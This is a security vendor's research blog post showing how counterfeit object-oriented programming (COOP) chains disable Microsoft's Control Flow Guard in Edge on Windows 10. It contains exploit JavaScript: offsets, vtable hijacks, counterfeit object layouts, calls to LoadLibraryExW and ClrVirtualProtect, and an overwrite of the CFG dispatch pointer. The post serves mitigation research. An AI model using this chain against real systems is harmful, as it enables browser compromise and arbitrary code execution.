Disarming Control Flow Guard Using Advanced Code Reuse Attacks

Advanced exploitation is moving away from ROP-based code-reuse attacks. Over the last two years, there has been a flurry of papers related to one novel code-reuse attack, Counterfeit Object-Oriented Programming (COOP). COOP represents a state-of-the-art attack targeting forward-edge control-flow integrity (CFI), and caught our attention in 2016 as we were integrating our CFI solution (HA-CFI) into our endpoint product. COOP largely remains in academia, and has yet to show up in exploit kits. This may be because attackers migrate towards the path of least resistance. In the case of Microsoft Edge on Windows 10 Anniversary Update, protected by Control Flow Guard (CFG), that path of least resistance is the absence of backward-edge CFI. But what happens when Return Flow Guard (RFG) emerges and the attacker can no longer rely on corrupting a return address on the stack?

We were curious to evaluate COOP against modern CFI implementations. This is not only a useful exercise that keeps us on top of cutting-edge research in academia and the hacking community, but it also allows us to measure the effectiveness of, alter the design of, or generally improve upon our own mitigations when necessary. This first post of our two-part blog series covers our adventures evaluating COOP function-reuse attacks against Microsoft’s CFG and later our own HA-CFI.

Microsoft Control Flow Guard

There have been a number of papers, blogs, and conference talks already discussing Microsoft’s Control Flow Guard (CFG) at length. Trail of Bits does an excellent job of comparing Clang CFI and Microsoft CFG in two recent posts. The first post focuses on Clang, the second emphasizes Microsoft’s implementation of CFI, while additional research provides further detail on the implementation of CFG. 

Bypassing CFG has also been a popular subject at security conferences over the past few years. Before we cite some notable bypasses, it is important to note that CFI can be further broken down into two types: forward-edge and backward-edge.

  • Forward-Edge CFI: Protects indirect CALL or JMP sites. Forward-edge CFI solutions include Microsoft CFG and Endgame’s HA-CFI.
  • Backward-Edge CFI: Protects RET instructions. Backward-edge CFI solutions include Microsoft Return Flow Guard, components of Endgame’s DBI exploit prevention, as well as other ROP detections including Intel’s CET.

This categorization helps delineate what CFG is designed to protect – indirect call sites – and what it’s not meant to protect – the return stack. For instance, a recent POC ended up in exploit kits targeting Edge using a R/W primitive to modify a return address on the stack. This is not applicable to CFG, and should not be considered a weakness of CFG. If anything, it demonstrates CFG successfully pushing attackers to hijack control flow somewhere other than at indirect call sites. Examples that actually demonstrate flaws or limitations of CFG include: leveraging unprotected call sites, remapping read-only memory regions containing CFG code pointers and changing them to point to code that always passes a check, a race condition with the JIT encoder in Chakra, and using memory-based indirect calls. COOP or function-reuse attacks in general are an acknowledged limitation for some CFI implementations and noted as out-of-scope for Microsoft’s bypass bounty due to “limitations of coarse-grained CFI”. That said, we are not aware of any public domain POCs that demonstrate COOP to specifically attack CFG hardened binaries.  

CFG adds a __guard_fids_table to each protected DLL, composed of a list of RVAs of valid or sensitive targets for indirect call sites within the binary. An address is used as an index into a CFG bitmap, where bits can be toggled depending upon whether the address should be a valid destination. An API also exists to modify this bitmap, for example, to support JIT encoded pages: kernelbase!SetProcessValidCallTargets which invokes ntdll!SetInformationVirtualMemory before making the syscall to update the bitmap.

A new enhancement to CFG in Windows 10 Creators Update enables suppression of exports. In other words, exported functions can now be marked as invalid target addresses for CFG protected call sites. The implementation of this requires using a second bit for each address within the CFGBitmap, as well as a flags byte in the __guard_fids_table for each RVA entry when building the initial per process bitmap. 

For 64-bit systems, bits 9-63 of the address are used as an index to retrieve a qword from the CFG bitmap, and bits 3-10 of the address are used (modulo 64) to access a specific bit within the qword. With export suppression, the CFG permissions for a given address are represented by two bits in the CFG bitmap. Additionally, __guard_dispatch_icall_fptr in most DLLs is now set to point to ntdll!LdrpDispatchUserCallTargetES where a valid call target must omit ‘01’ from the CFG bitmap. 
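As a rough illustration of the lookup arithmetic described above, the following sketch computes where an address lands in the bitmap. It follows the bit ranges given in this post rather than any disassembly of ntdll. The function names and the `BigUint64Array` standing in for the bitmap are assumptions made for illustration, and only 16-byte-aligned targets are handled.

```javascript
// Sketch only: mirrors the indexing described in the text, not ntdll's actual code.
// Helper names are hypothetical; addresses are BigInt because they are 64-bit values.
function cfgBitmapPosition(address) {
  const addr = BigInt.asUintN(64, BigInt(address));
  return {
    qwordIndex: addr >> 9n,                // bits 9-63 select the qword
    bitOffset: Number((addr >> 3n) % 64n), // (address >> 3) modulo 64 selects the bit
  };
}

// Read the two-bit entry for a 16-byte-aligned address from a simulated bitmap.
function readCfgEntry(bitmap, address) {
  const { qwordIndex, bitOffset } = cfgBitmapPosition(address);
  const qword = bitmap[Number(qwordIndex)];
  return Number((qword >> BigInt(bitOffset)) & 0b11n);
}

// Example: a tiny simulated bitmap covering addresses 0x000 through 0x3FF.
const demoBitmap = new BigUint64Array(2);
demoBitmap[1] = 0b01n << 2n; // set the entry for address 0x210 to '01'

console.log(cfgBitmapPosition(0x210n));        // qword 1, bit offset 2
console.log(readCfgEntry(demoBitmap, 0x210n)); // 1
```

Each 16-byte slot of address space maps to one two-bit entry, which is why a single qword of the bitmap covers 512 bytes.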

Implementing this new export suppression feature becomes a bit complicated when you factor in dynamically resolving symbols, since using GetProcAddress implies subsequent code may invoke the return value as a function pointer. Control Flow Guard handles this by changing the corresponding two-bit entry in the CFG bitmap from ‘10’ (export suppressed) to ‘01’ (valid call target) as long as the entry was not previously marked as sensitive or not marked valid at all (e.g. VirtualProtect, SetProcessValidCallTargets, etc.). As a result, some exports will begin as invalid indirect call targets on process creation, but eventually become valid call targets due to code executed at runtime. This is important to remember later in our discussion. For reference, a sample call stack when this occurs looks as follows:

00 nt!NtSetInformationVirtualMemory
01 nt!setjmpex
02 ntdll!NtSetInformationVirtualMemory
03 ntdll!RtlpGuardGrantSuppressedCallAccess
04 ntdll!RtlGuardGrantSuppressedCallAccess
05 ntdll!LdrGetProcedureAddressForCaller
06 KERNELBASE!GetProcAddress
07 USER32!InitializeImmEntryTable
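The state change that GetProcAddress triggers for a suppressed export can be modeled in a few lines. This is a minimal sketch covering only the two encodings named in the text (‘10’ and ‘01’). The constant and function names are hypothetical, and any other entry value is simply left unchanged, since the post does not spell out the remaining encodings.

```javascript
// Sketch only: models the two states named in the text; other encodings stay opaque.
const CFG_EXPORT_SUPPRESSED = 0b10; // '10' per the text
const CFG_VALID_TARGET = 0b01;      // '01' per the text

// Hypothetical model of what happens to one bitmap entry when an export is resolved.
function grantSuppressedCallAccess(entry) {
  return entry === CFG_EXPORT_SUPPRESSED ? CFG_VALID_TARGET : entry;
}

console.log(grantSuppressedCallAccess(CFG_EXPORT_SUPPRESSED) === CFG_VALID_TARGET); // true
console.log(grantSuppressedCallAccess(0b00)); // 0, entries that were never suppressed stay as they are
```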

 

COOP Essentials

Schuster et al. identified counterfeit object-oriented programming (COOP) as a potential weakness to CFI implementations. The attack sequences together and reuses existing virtual functions in order to execute code while passing all forward-edge CFI checks along the way. In a similar manner to ROP, the result is a sequence of small valid functions that individually perform minimal computation (e.g. load a value into RDX), but when pieced together perform some larger task. A fundamental component of COOP is to leverage a main loop function, which might iterate over a linked-list or array of objects, invoking a virtual method on each object. The attacker is then able to piece together “counterfeit” objects in memory, in some cases overlapping the objects, such that the main loop will call valid virtual functions of the attacker’s choosing in a controlled order. Schuster et al. demonstrated the approach with COOP payloads targeting Internet Explorer 10 on Windows 7 32-bit and 64-bit, and Firefox on Linux 64-bit. The research was later extended, demonstrating that recursion or functions with many indirect call invocations could also be used instead of a loop, and extended yet again into targeting the Objective-C runtime. 

This prior research is extremely interesting and novel. We wanted to apply the concept to some modern CFI implementations to assess: a) the difficulty of crafting a COOP payload in a hardened browser; b) whether we could bypass CFG and HA-CFI; and c) whether we could improve our CFI to detect COOP style attacks. 

 

Our Target

Our primary target for COOP was Microsoft Edge on Windows 10, as it represents a fully hardened CFG application, and allows us to prepare our COOP payload in memory using JavaScript. While vulnerabilities are always of interest to our team, for this effort we focus on the hijack of control flow with CFI in place, and make the following assumptions as an attacker:

  1. An arbitrary read-write primitive is obtained from JavaScript.
  2. Hardcoded offsets are allowed, as dynamically finding gadgets at run-time is out of scope for this particular effort.
  3. All of Microsoft’s latest mitigations in Creators Update are enabled (e.g. ACG, CIG, CFG with export suppression).
  4. The attacker must not bypass or avoid CFG in any way other than using COOP.

For our initial research, we leveraged a POC from Theori for Microsoft Edge on Windows 10 Anniversary Update (OS build 14393.953). However, we designed our payload with Creators Update mitigations in mind, and validated our final working COOP payload on Windows 10 Creators Update (OS build 15063.138) with export suppression enabled.

An ideal POC would execute some attacker shellcode or launch an application. A classic code execution model for an attacker is to map some controlled data in memory as +X, and then jump to shellcode in that newly modified +X region. However, our real goal is to generate COOP payloads that execute something meaningful while protected by forward-edge CFI. Such a payload provides data points with which we can test and refine our own CFI algorithms. Further, attacking Arbitrary Code Guard (ACG) or the child process policy in Edge is slightly out of scope. We decided an acceptable end goal for our research on Windows 10 Creators Update was to use COOP to effectively disable CFG, opening up the ability to then jump or call any arbitrary location within a DLL. We thus ended up with two primary COOP payloads:

  1. For Windows 10 Anniversary Update, and a lack of ACG, our payload maps data we control as executable, and then jumps into that region of controlled shellcode after disabling CFG.
  2. For Windows 10 Creators Update, our end goal was to simply disarm CFG. 

 

Finding COOP Gadgets

Following the blueprint left by Schuster et al., our first order of business was to agree upon a terminology for the various components of COOP. The academic papers refer to each reused function as a virtual function gadget or vfgadget, and when describing each specific type of vfgadget an abbreviation is used such as ML-G for a main loop vfgadget. We opted to name each type of gadget in a more informal way. Terms you find in the remaining post are defined here:

  • Looper: the main loop gadget critical to executing complex COOP payloads (ML-G in paper)
  • Invoker: a vfgadget which invokes a function pointer (INV-G in paper)
  • Arg Populator: a virtual function which preps an argument, either loading a value into a register (LOAD-R64-G in paper), or moving the stack pointer and/or loading values on the stack (MOVE-SP-G in paper)

Similar to the paper, we wrote scripts to help us identify vfgadgets in a given binary. We used IDAPython, with logic to find loopers, invokers, and argument populators. In our research, we found that a practical approach to COOP is to chain together and execute a small number of vfgadgets at a time, before returning to JavaScript, repeating the process through additional COOP payloads as needed. For this reason, we did not find it necessary to lift binary code to IR for our purposes. However, piecing together an extremely large COOP payload, such as running a C2 socket thread entirely via reused code, may require lifting to IR in order to assemble the desired sequence. For each subtype of vfgadget, we defined a list of rules that we used while conducting a search within two of the more fruitful binaries in Edge (chakra.dll and edgehtml.dll). A few of these rules for a looper vfgadget include:

  1. Function is present in the __guard_fids_table
  2. Function contains a loop with exactly 1 indirect call taking 0 arguments
  3. Loop must not clobber argument registers
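The three rules above can be expressed as a simple predicate. The sketch below is not our IDAPython tooling; it only models the filtering step in JavaScript, and the record shape (`inGuardFidsTable`, `loops`, `indirectCalls`, `clobbersArgRegisters`) is a hypothetical stand-in for whatever a disassembler script would extract per function.

```javascript
// Sketch only: the record shape is hypothetical, standing in for per-function
// facts that a disassembler script would extract.
function isLooperCandidate(fn) {
  if (!fn.inGuardFidsTable) return false;   // rule 1: valid CFG target
  return fn.loops.some((loop) =>
    loop.indirectCalls.length === 1 &&      // rule 2: exactly one indirect call...
    loop.indirectCalls[0].argCount === 0 && //         ...taking 0 arguments
    !loop.clobbersArgRegisters              // rule 3: argument registers survive
  );
}

// Made-up sample records for illustration.
const sampleFunctions = [
  { name: "A", inGuardFidsTable: true,
    loops: [{ indirectCalls: [{ argCount: 0 }], clobbersArgRegisters: false }] },
  { name: "B", inGuardFidsTable: false,
    loops: [{ indirectCalls: [{ argCount: 0 }], clobbersArgRegisters: false }] },
  { name: "C", inGuardFidsTable: true,
    loops: [{ indirectCalls: [{ argCount: 0 }, { argCount: 2 }], clobbersArgRegisters: false }] },
  { name: "D", inGuardFidsTable: true,
    loops: [{ indirectCalls: [{ argCount: 0 }], clobbersArgRegisters: true }] },
];

console.log(sampleFunctions.filter(isLooperCandidate).map((f) => f.name)); // [ 'A' ]
```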

 

Of all the classes of vfgadgets, the search for loopers was the most time consuming. Many potential loopers have restrictions that make them hard to work with. Our hunt for invokers turned up not only vfgadgets for invoking function pointers, but also many vfgadgets that can very quickly and easily populate up to six arguments at once, all from a single counterfeit object. For this reason, there are shortcuts available for COOP when attempting to invoke a single API, which completely avoid requiring a loop or recursion, unless a return value is needed. Numerous register populators were found for all argument registers on x64. It is worth mentioning that a number of the original vfgadgets proposed in the Schuster et al. COOP paper from mshtml can still be found in edgehtml. However, we added a requirement to our effort to avoid reusing any of these and instead find all new vfgadgets for our COOP payloads.

 

COOP Payloads

By triggering COOP from a scripting language, we can actually move some complex tasking out of COOP, since chaining together everything at once can get complicated. We can use JavaScript to our advantage and repeatedly invoke miniature COOP payload sequences. This allows us to move things like arithmetic and conditional operations back to JavaScript, and leave the bare essential function reuse to prepping and invoking critical APIs via COOP. Further, we show an example of this methodology, including passing return values from COOP back to JavaScript, in our Hijack #1 section discussing how to invoke LoadLibrary.

For brevity, I will only step through one of our simplest payloads. A common theme to all of our payloads is the requirement to invoke VirtualProtect. Since VirtualProtect and the eshims APIs are marked as sensitive and not a valid target for CFG, we have to use a wrapper function in Creators Update. As originally suggested by Thomas Garnier, a number of convenient wrappers can be found in .NET libraries mscoree.dll and mscories.dll such as UtilExecutionEngine::ClrVirtualProtect. Because Microsoft’s ACG prevents creating new executable memory, or changing existing executable memory to become writable, an alternate approach is required. Read-only memory can be remapped as writable with VirtualProtect, so I borrow the technique from a BlackHat 2015 presentation, and remap the page containing chakra!__guard_dispatch_icall_fptr as writable, then overwrite the function pointer to point to an arbitrary place in chakra.dll that contains a jmp rax instruction. In fact, there already exists a function in most DLLs, __guard_dispatch_icall_nop, which is exactly that – a single jmp rax instruction. As a result, I can effectively disable CFG since all protected call sites within chakra.dll will immediately just jump to the target address as if it passed all checks. Presumably one could take this a step further to explore function-reuse to attack ACG. To accomplish this mini-chain, the following is required:

  1. Load mscoree.dll into the Edge process
  2. Invoke ClrVirtualProtect +W on a read-only memory region of chakra.dll
  3. Overwrite __guard_dispatch_icall_fptr to always pass check

As seen from the list of vfgadgets above, edgehtml is an important library for COOP. Thus, the first order of business is to leak the base address for edgehtml as well as any other necessary components, such as our counterfeit memory region. This way the payload can contain hardcoded offsets to be rebased at runtime. Using the info leak bug in Theori’s POC, we can obtain all the base addresses we need. 

 

//OS Build 10.0.14393
var chakraBase = Read64(vtable).sub(0x274C40);
var guard_disp_icall_nop = chakraBase.add(0x273510);
var chakraCFG = chakraBase.add(0x5E2B78); //_guard_dispatch_icall...
var ntdllBase = Read64(chakraCFG).sub(0x95260);

//Find global CDocument object, VTable, and calculate EdgeHtmlBase
var [hi, lo] = PutDataAndGetAddr(document);
var CDocPtr = Read64(new Long(lo + 0x30, hi, true));
var EdgeHtmlBase = Read64(CDocPtr).sub(0xE80740);

//Rebase our COOP payload
rebaseOffsets(EdgeHtmlBase, chakraBase, ntdllBase, pRebasedCOOP);
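To make the idea of rebasing hardcoded offsets concrete, here is a minimal sketch of one way such a step could work. It is not the `rebaseOffsets` helper used above, whose body is not shown in this post. The `rebasePayload` name, the template format, and the base addresses and offsets are all made up for illustration.

```javascript
// Sketch only: a hypothetical rebasing helper, not the rebaseOffsets() used above.
// Each template slot is either { module, offset } (rebased) or { value } (copied as-is).
function rebasePayload(template, bases) {
  const out = new BigUint64Array(template.length);
  template.forEach((slot, i) => {
    if ("module" in slot) {
      if (!(slot.module in bases)) throw new Error("unknown module: " + slot.module);
      out[i] = bases[slot.module] + slot.offset; // leaked base + hardcoded offset
    } else {
      out[i] = slot.value;                       // plain data such as flags or sizes
    }
  });
  return out;
}

// Made-up base addresses and offsets, purely for illustration.
const demoBases = { edgehtml: 0x7ffb10000000n, chakra: 0x7ffb20000000n };
const demoTemplate = [
  { module: "edgehtml", offset: 0x1000n },
  { value: 0x800n },
  { module: "chakra", offset: 0x2000n },
];

const rebased = rebasePayload(demoTemplate, demoBases);
console.log(Array.from(rebased, (q) => "0x" + q.toString(16)));
```

Keeping module-relative slots separate from plain data means the same template can be reused across runs, with only the leaked base addresses changing.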

 

Triggering COOP

A key part of using COOP is the initial transition from JavaScript into a looper function. Using our assumed R/W primitive, we can easily hijack a vtable in chakra to point to our looper, but how do we ensure the looper then begins iterating over our counterfeit data? For that answer we need to evaluate the looper, which I chose as CTravelLog::UpdateScreenshotStream: 

 

Notice in the first block before the loop, the code retrieves a pointer to a linked list at this + 0x30. In order to properly kick off the looper, we must both hijack a JavaScript object’s vtable to include the address of our looper, and place a pointer at object + 0x30 that points to the start of our counterfeit object list. The actual counterfeit object data can be defined and rebased entirely in JavaScript. Also notice the loop iterates over a list with a next pointer at object + 0x80. This is important when crafting our counterfeit object stream. Additionally, notice the vtable offset for this indirect call site is +0xF8. Every fake vtable pointer in our counterfeit objects must therefore point to the address of the desired function pointer minus 0xF8, which often will be in the middle of some neighboring vtable. To kick off our COOP payload, I chose to hijack a JavascriptNativeIntArray object and will specifically override the freeze() and seal() virtual functions as follows.

var hijackedObj = new Array(0);
[hi, lo] = PutDataAndGetAddr(hijackedObj);
var objAddr = new Long(lo, hi, true);
Write64(objAddr.add(0x30), pRebasedCOOP);
Write64(objAddr, pFakeVTable);
Object.seal(hijackedObj); //Trigger initial looper
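The layout constraints described above (vtable pointer at +0x00, next pointer at +0x80, call slot at vtable + 0xF8) can be sketched as a small builder. This is an illustration under simplifying assumptions: objects are laid out contiguously at a fixed stride rather than overlapped, the list is assumed to end with a null next pointer, and the names `fakeVtableFor` and `buildCounterfeitList` are hypothetical.

```javascript
// Sketch only: offsets come from the text; everything else is a simplification.
const NEXT_OFFSET = 0x80; // next pointer offset walked by the looper
const CALL_SLOT = 0xF8n;  // vtable offset used by the looper's indirect call

// The looper calls [vtable + 0xF8], so the fake vtable pointer must sit 0xF8
// below the slot that actually holds the desired function pointer.
function fakeVtableFor(slotAddress) {
  return slotAddress - CALL_SLOT;
}

// Lay out one counterfeit object per slot address. regionBase is the address the
// buffer will occupy in the target process (assumed known from an info leak).
function buildCounterfeitList(regionBase, slotAddresses, stride = 0x100) {
  const buf = new ArrayBuffer(slotAddresses.length * stride);
  const view = new DataView(buf);
  slotAddresses.forEach((slot, i) => {
    const off = i * stride;
    const isLast = i === slotAddresses.length - 1;
    view.setBigUint64(off, fakeVtableFor(slot), true); // +0x00: fake vtable pointer
    view.setBigUint64(off + NEXT_OFFSET,               // +0x80: next object, or null
      isLast ? 0n : regionBase + BigInt(off + stride), true);
  });
  return buf;
}

// Made-up addresses for illustration.
const listBuf = buildCounterfeitList(0x10000n, [0x7000F8n, 0x800100n]);
const listView = new DataView(listBuf);
console.log("0x" + listView.getBigUint64(0x00, true).toString(16)); // 0x700000
console.log("0x" + listView.getBigUint64(0x80, true).toString(16)); // 0x10100
```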

 

 

Hijack #1: Invoking LoadLibrary

As previously stated, my end goal was bypassing CFG on Edge on Windows 10 Creators Update with export suppression enabled. Looking at the various LoadLibrary calls exported in kernel32 and kernelbase, it turns out loading a new DLL into our process is rather easy even with the latest CFG feature in place. The reason for this is two-fold. First, LoadLibraryExW is actually marked as a valid call target in the __guard_fids_table within kernel32.dll.

 

 

Second, the rest of the LoadLibrary calls within both kernel32 and kernelbase start out as suppressed, but in Edge they eventually become valid call targets. This appears to stem from some delayed loading in MicrosoftEdgeCP!_delayLoadHelper2, which eventually results in GetProcAddress being called on the LoadLibraryX APIs. As foreshadowed earlier, this demonstrates the difficulty of making all function exports invalid call targets. Even if these other LoadLibrary call gates remained suppressed or were only opened temporarily, for our purposes we can just use kernel32!LoadLibraryExW since it’s initialized as a valid target.

To get our desired VirtualProtect wrapper loaded into the Edge process, we need to invoke LoadLibraryExW(“mscoree.dll”, NULL, LOAD_LIBRARY_SEARCH_SYSTEM32). We could cut corners here, and leverage one of the aforementioned invokers to populate all of our parameters at once, but instead let’s create a traditional COOP payload using a looper vfgadget to iterate over four counterfeit objects. 

 

Our first iteration will populate r8d with 0x800. CHTMLEditor::IgnoreGlyphs is a nice vfgadget to populate r8d as seen in the assembly below. Our parameter 0x800 (LOAD_LIBRARY_SEARCH_SYSTEM32) will be loaded from this + 0xD8. Recall that the next pointer in our counterfeit objects must be at +0x80. We could create four contiguous counterfeit objects in memory, each of size greater than 0xD8, or we could treat the next pointer as being located at the end of our object. I chose the latter. In this case, we will have overlapping objects, so we must be careful that the data at this + 0xD8 does not interfere with the vfgadget from our second iteration that operates on the second object in memory. The first counterfeit object for populating r8d looks as follows:

 

 

Upon return from this vfgadget, the looper then iterates over our fake linked list and must now invoke another vfgadget, this time to populate rdx with a value of 0x0 (NULL). To achieve this I use Tree::ComputedRunTypeEnumLayout::BidiRunBox::RunType(). We can load our value (0x0) from our counterfeit object + 0x28.

 

 

Now that we have populated parameters 2 and 3 for our API call, we need to populate the first argument, a pointer to our ‘mscoree.dll’ string, and then invoke a function pointer to LoadLibraryExW. A perfect invoker vfgadget exists for this purpose, Microsoft::WRL::Details::InvokeHelper::Invoke(). The assembly and corresponding third counterfeit object are as follows: 

 

 

Now that LoadLibraryExW has been called, and hopefully mscoree.dll loaded into our process, we need to get the return value back to JavaScript to rebase additional COOP payloads. Both the looper and CFG make use of RAX for the indirect branch target, so we need to find another way to get the virtual address of the newly loaded module back to JavaScript. Fortunately, upon exiting LoadLibraryExW, RDX also contains a copy of the module address. Therefore, we can tack on one final vfgadget to our object list in order to move RDX back into our counterfeit object memory region. For the final iteration of our loop, we will invoke CBindingURLBlockFilter::SetFilterNotify(), which will copy RDX into the address of our current counterfeit object – 0x88.

 

 

The looper then reaches the end of our list, and returns from the hijacked seal() call transferring control back to our JavaScript code. The first COOP payload has completed, mscoree.dll has been loaded into Edge, and we can now retrieve the base address for mscoree from JavaScript in the code snippet below.  

//Retrieve loadlibrary return val from coop region
var mscoreebase = Read64(pRebasedCOOP.add(0x128));
alert("mscoree.dll loaded at: 0x" + mscoreebase.toString(16));
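The four-iteration chain from this section can be modeled in plain JavaScript to show how the pieces fit together. This is a toy simulation, not exploit code: registers are fields on an object, each vfgadget is an ordinary function, `fakeLoadLibraryExW` is a stand-in that returns a made-up base address, and all names are hypothetical.

```javascript
// Sketch only: a toy model of the four-iteration chain. Registers are object
// fields, vfgadgets are plain functions, and nothing here touches a real process.
const regs = { rcx: null, rdx: 0n, r8: 0n, rax: 0n };
const FAKE_MODULE_BASE = 0x7ffa00000000n; // made-up value for illustration
const recordedCalls = [];

// Stand-in for LoadLibraryExW. Per the text, RDX also holds the module address on exit.
function fakeLoadLibraryExW(name, hFile, flags) {
  recordedCalls.push({ name, hFile, flags });
  regs.rdx = FAKE_MODULE_BASE;
  return FAKE_MODULE_BASE;
}

const vfgadgets = {
  loadR8:   (obj) => { regs.r8 = obj.value; },               // iteration 1
  loadRdx:  (obj) => { regs.rdx = obj.value; },              // iteration 2
  invoke:   (obj) => {                                       // iteration 3
    regs.rcx = obj.arg;
    regs.rax = obj.target(regs.rcx, regs.rdx, regs.r8);
  },
  storeRdx: (obj) => { obj.scratch.result = regs.rdx; },     // iteration 4
};

// Looper: walk the linked list, making one "virtual call" per counterfeit object.
function runLooper(head) {
  for (let obj = head; obj !== null; obj = obj.next) {
    vfgadgets[obj.vfgadget](obj);
  }
}

const scratch = { result: 0n };
const obj4 = { vfgadget: "storeRdx", scratch, next: null };
const obj3 = { vfgadget: "invoke", arg: "mscoree.dll", target: fakeLoadLibraryExW, next: obj4 };
const obj2 = { vfgadget: "loadRdx", value: 0n, next: obj3 };
const obj1 = { vfgadget: "loadR8", value: 0x800n, next: obj2 };

runLooper(obj1);
console.log("module base read back: 0x" + scratch.result.toString(16));
```

The final `storeRdx` step is what lets the script side recover the result after the looper returns, mirroring the read from the counterfeit region shown above.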

 

Hijack #2: Invoking VirtualProtect Wrapper

Having successfully completed our first COOP payload, we can now rebase a second COOP payload to invoke ClrVirtualProtect on the read-only memory region that contains chakra!__guard_dispatch_icall_fptr in order to make it writable. Our objective is to call ClrVirtualProtect(this, chakraPageAddress, 0x1000, PAGE_READWRITE, pScratchMemory). This time we will demonstrate a COOP payload that does not make use of a loop or recursion by using a single counterfeit object to populate all arguments and invoke a function pointer. We’ll use the same invoker vfgadget as before, only this time it is primarily used to move a counterfeit object into rcx.

 

 

We hijack the freeze() virtual method from our original JavascriptNativeIntArray to point to Microsoft::WRL::Details::InvokeHelper::Invoke. This vfgadget loads a new this pointer from the address stored at this + 0x10, and treats this + 0x18 as a function pointer. Thus, using our R/W primitive from JavaScript, in addition to hijacking the vtable to call this invoker trampoline function, we also need to overwrite the values at object + 0x10 and object + 0x18.

Write64(objAddr.add(0x10), pCOOPMem2);
Write64(objAddr.add(0x18), EdgeHtmlBase.add(0x2DC540));
Object.freeze(hijackedObj); //Trigger the invoker via the hijacked freeze()

 

Notice that our fake object will load all the required parameters for ClrVirtualProtect, as well as populate the address of ClrVirtualProtect into rax by resolving index +0x100 from another fake vtable. Upon completion, this will map the desired page in chakra.dll to be writable.

 

 

At this point we are done with COOP, and our last step is to actually disarm CFG for chakra.dll. We can pick any arbitrary address in chakra.dll that contains the instruction jmp rax. Once this is identified, we use our write primitive from JavaScript to overwrite the function pointer for chakra!__guard_dispatch_icall_fptr to point to this address. This has the effect of NOPing the CFG validation routine, and allows us to hijack a chakra vtable from JavaScript to jump anywhere. 

//Change chakra CFG pointer to NOP check
Write64(chakraCFG, guard_disp_icall_nop);
//Trigger hijack to 0x4141414141414141
Object.isFrozen(hijackedObj);
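Why a single pointer overwrite disarms every protected call site in the module can be seen in a toy model. In the sketch below, `checkedDispatch` stands in for the validating routine and `nopDispatch` for `__guard_dispatch_icall_nop`. The object and function names are hypothetical, and targets are strings rather than addresses.

```javascript
// Sketch only: a toy model of one module's guarded call sites. All names are hypothetical.
const validTargets = new Set(["legitFunction"]);
const functions = {
  legitFunction: () => "legit",
  arbitraryCode: () => "hijacked",
};

// Stand-in for the validating dispatch routine: reject targets missing from the bitmap.
function checkedDispatch(target) {
  if (!validTargets.has(target)) throw new Error("CFG violation: " + target);
  return functions[target]();
}

// Stand-in for __guard_dispatch_icall_nop: transfer control with no check (jmp rax).
function nopDispatch(target) {
  return functions[target]();
}

// The per-module function pointer that every protected call site goes through.
const chakraModel = { guardDispatchIcallFptr: checkedDispatch };
function protectedCallSite(target) {
  return chakraModel.guardDispatchIcallFptr(target);
}

function tryCall(target) {
  try { return protectedCallSite(target); } catch (e) { return "blocked"; }
}

console.log(tryCall("arbitraryCode"));            // blocked
chakraModel.guardDispatchIcallFptr = nopDispatch; // the single pointer overwrite
console.log(tryCall("arbitraryCode"));            // hijacked
```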

As the WinDbg output below illustrates, with CFG now disabled our hijack was successful and the process crashes when trying to jump to the unmapped address 0x4141414141414141. It’s important to point out that we could have made this hijack jump to anywhere in the process address space due to CFG being disabled. By comparison, with CFG in place an exception would have been thrown since 0x4141414141414141 is not valid in the bitmap, and we would have seen the original CFG routine that we swapped out, ntdll!LdrpDispatchUserCallTargetES, in our call stack.

 

 

Conclusion

In this post, I discussed COOP, a novel code-reuse attack proposed in academia, and demonstrated how it can be used to attack modern Control-Flow Integrity implementations, such as Microsoft CFG. Overall, COOP is fairly easy to work with, particularly when breaking up payloads into smaller chains. Piecing together vfgadgets is not unlike the exercise of assembling ROP gadgets. Perhaps the most time consuming portion is finding and labeling candidate vfgadgets of various types within your target process space.

Microsoft’s Control Flow Guard is considered a coarse-grained CFI implementation and is thus more vulnerable to function reuse attacks such as described here. By comparison, fine-grained CFI solutions are able to validate call sites beyond just the target address considering elements such as expected VTable type, validating number of arguments, or even argument types, for a given indirect call. A key tradeoff between the two approaches is performance, as introducing too much complexity into a CFI policy can add significant overhead. Nonetheless, mitigating advanced code-reuse attacks is important moving forward as applications become hardened with some form of forward-edge and backward-edge CFI.

To offset some of the limitations of CFG, Microsoft appears to be focused on diversifying its preventions such as protecting critical call gates like VirtualProtect with export suppression in CFG and Arbitrary Code Guard. However, one important takeaway from this post should be the challenges of designing and enforcing mitigations from user-space. As we saw with EMET a couple of years ago, researchers were able to disarm EMET by reusing code inserted by EMET itself. Further, as was originally demonstrated at BlackHat 2015, here we are similarly taking advantage of critical CFG function pointers residing in user-space to alter the behavior of CFG.

By comparison, Endgame’s HA-CFI solution is implemented and enforced entirely from the kernel and uses hardware features that, even if vulnerable to function reuse attacks, make it more difficult to tamper with because of the privilege separation. In the second part of this series, I will discuss the COOP adventures with our own HA-CFI and ongoing research, and how our detection logic evolves to account for advanced function reuse attacks.